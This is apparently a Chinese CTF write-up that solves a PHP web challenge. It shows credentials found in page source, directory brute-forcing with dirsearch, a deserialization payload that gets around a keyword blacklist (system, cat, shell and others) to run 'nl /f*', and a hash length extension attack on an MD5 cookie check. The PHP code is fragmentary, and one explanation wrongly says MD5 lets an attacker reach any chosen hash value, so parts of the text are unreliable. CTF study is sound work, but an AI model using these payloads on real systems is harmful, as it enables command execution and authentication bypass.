查看源码能看见账号:username169,密码:password196提交这个用户密码可以跳转到页面/dhwiaoubfeuobgeobg.php
通过dirsearch目录爆破可以得到www.zip
a = 'admin'; $this->b = 'admin'; } public function __destruct(){ if(!preg_match("/flag|system|php|cat|tac|shell|sort/i", $this->a) && !preg_match("/flag|system|php|cat|tac|shell|sort/i", $this->b)){ system($this->a.' '.$this->b); }else{ echo "again?"; } } } $wzbz = $_GET['wzbz']; unserialize($wzbz); ?>
system($this->a.' '.$this->b);这里可以命令执行,使a=nl,b=/f*绕过正则
pop链:
a = 'nl'; $this->b = '/f*'; } } $f=new Flag(); echo serialize($f); ?>
得到O:4:"Flag":2:{s:1:"a";s:2:"nl";s:1:"b";s:3:"/f*";}
payload:
wzbz=O:4:"Flag":2:{s:1:"a";s:2:"nl";s:1:"b";s:3:"/f*";}
"; echo(md5($secret."adminpassword")); @$username = urldecode($_POST["username"]); @$password = urldecode($_POST["password"]); if (!empty($_COOKIE["source"])) { if ($username === "admin" && $password != "password") { if ($_COOKIE["source"] === md5($secret.$username.$password)) { // 在验证用户后,如果登录成功,设置会话变量来表示用户已登录 $_SESSION['loggedin'] = true; $_SESSION['username'] = 'admin'; // 用户名 $_SESSION['role'] = 'admin'; // 用户角色或权限 echo ""; } else { echo "
"; die ("你的cookie好像不太对啊"); } } else { die ("可不会轻易放你进去"); } } 14 879bd10c8628894d388c068a25326c21
看别人的wp得知这里使用了哈希拓展攻击
我们注意到,md5($salt+“adminroot”)=e6ccbf12de9d33ec27a5bcfb6a3293df,对于未知salt的MD5或SHA-1哈希,哈希长度拓展攻击可以被用来构造一个新的有效哈希值,从而绕过原有的认证。这是因为,MD5和SHA-1算法的哈希函数存在一个特定的性质:给定一个消息M和其哈希值H,可以很容易地计算出一个新的消息M',使得M'的哈希值为任意指定的值H'。
哈希拓展攻击(Hash Length Extension Attack)是一种针对使用哈希函数进行消息认证的协议或应用的攻击方式。
哈希函数是将任意长度的输入数据映射为固定长度的输出,具有唯一性、不可逆性和抗碰撞等特性。在正常情况下,应用程序或协议会对消息进行哈希运算,并将哈希值与消息一起传输或存储,以实现消息的完整性验证。然而,在一些哈希函数中,如MD5和SHA-1等较旧的哈希算法,存在一个安全漏洞,即哈希拓展攻击。攻击者可以通过已知的哈希值和一些补充数据(称为扩展数据),使用特定的方法生成新的哈希值,而无需知道原始数据的内容。
具体来说,攻击者可以利用已知的哈希值H,通过在原始消息M的末尾添加扩展数据E,并对新的消息(M||E)进行哈希运算,得到新的哈希值H'。这个新的哈希值H'可以被认为是对新消息(M||E)的完整性验证,而不需要知道原始消息M的内容。哈希拓展攻击可能导致认证绕过、身份伪造、篡改数据等安全问题。